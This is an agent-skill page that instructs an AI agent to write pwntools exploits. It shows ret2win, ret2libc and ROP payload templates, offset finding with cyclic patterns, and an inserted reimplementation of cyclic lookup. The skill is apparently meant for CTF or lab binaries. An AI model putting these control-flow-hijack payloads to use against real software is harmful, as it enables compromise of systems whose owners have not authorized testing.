Agent skill
exploit-development
Develop working exploits using pwntools. Includes exploit template and common patterns.
Stars
163
Forks
31
Install this agent skill to your Project
npx add-skill https://github.com/majiayu000/claude-skill-registry/tree/main/skills/development/exploit-development-amattas-agentic-coding
SKILL.md
Exploit Development
Build working exploits based on vulnerability analysis.
Exploit Development Process
- Start from template - Use templates/exploit.py
- Find offset - Use cyclic pattern
- Identify target - Win function, ROP chain, shellcode
- Handle mitigations - Leak addresses if needed
- Build payload - Padding + control flow hijack
- Test locally - With and without GDB
- Test remote - Adjust for remote environment
Stack Consistency (CRITICAL)
Always use fixed argv[0] and empty environment:
```python
from pwn import *

# EXECUTABLE is the path to the target binary, as defined in templates/exploit.py
ARGV0 = "/pwn"   # fixed argv[0]: its length shifts everything on the stack
ENV = {}         # empty environment: no environment strings above the stack

def conn():
    if args.GDB:
        return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
    else:
        return process([EXECUTABLE], env=ENV, argv=[ARGV0])
```
Because argv[0] and the environment strings sit above the stack frames, keeping both identical ensures stack addresses match between a normal run and a GDB debug session.
Finding Offset
```python
# Generate pattern
from pwn import cyclic, cyclic_find

payload = cyclic(200)

# After crash, find offset
# In GDB: cyclic -l 0x61616168
offset = cyclic_find(0x61616168)
```
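To show why the crash value maps to exactly one offset, here is an added, self-contained reimplementation of `cyclic` and `cyclic_find` that does not need pwntools installed; it is not part of the skill or of pwntools itself. It builds the same lexicographically smallest de Bruijn sequence pwntools uses (alphabet a-z, every 4-byte window unique), and packs an integer little-endian the way pwntools does by default, so `0x61616168` becomes `b"haaa"` and resolves to offset 28.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # pwntools' default alphabet
N = 4  # window length: every N-byte slice of the sequence is unique


def _de_bruijn(alphabet: bytes = ALPHABET, n: int = N):
    """Lazily yield B(k, n), the lexicographically smallest de Bruijn
    sequence, via the Lyndon-word (FKM) construction pwntools also uses."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (same output as pwntools' cyclic)."""
    return bytes(islice(_de_bruijn(), length))


def cyclic_find(subseq) -> int:
    """Offset of `subseq` in the pattern, or -1.

    An int is packed little-endian (pwntools' default endianness), so a
    crash value read from a register such as RSP/RIP can be passed directly.
    """
    if isinstance(subseq, int):
        subseq = struct.pack("<I", subseq)
    subseq = bytes(subseq[:N])
    if not subseq:
        raise ValueError("empty subsequence")
    window = b""
    for i, ch in enumerate(_de_bruijn()):
        window = (window + bytes([ch]))[-N:]
        if window[-len(subseq):] == subseq:
            return i - len(subseq) + 1
    return -1


if __name__ == "__main__":
    # Constructed crash value from the text above: 0x61616168 == b"haaa"
    print(cyclic(20))                     # b'aaaabaaacaaadaaaeaaa'
    print(cyclic_find(0x61616168))        # 28
```

Because the de Bruijn property guarantees each 4-byte window occurs once, the first match is the only match, which is what makes the offset from a single crash value trustworthy; a 200-byte pattern is far below the 26^4 period, so no wraparound can produce a false hit.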
Common Payload Patterns
Simple ret2win
```python
payload = b'A' * offset
payload += p64(win_addr)
```
ret2win with alignment
```python
payload = b'A' * offset
payload += p64(ret_gadget)  # 16-byte alignment
payload += p64(win_addr)
```
ret2libc
```python
payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
```
ROP with pwntools
```python
# elf is the loaded target binary, e.g. elf = ELF(EXECUTABLE)
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
```
Debugging Tips
- `context.log_level = 'debug'` for verbose output
- `gdb.attach(p)` to attach to running process
- `pause()` to stop and inspect
- Print addresses: `print(f"addr: {hex(addr)}")`
Output
Produce exploit.py using the template.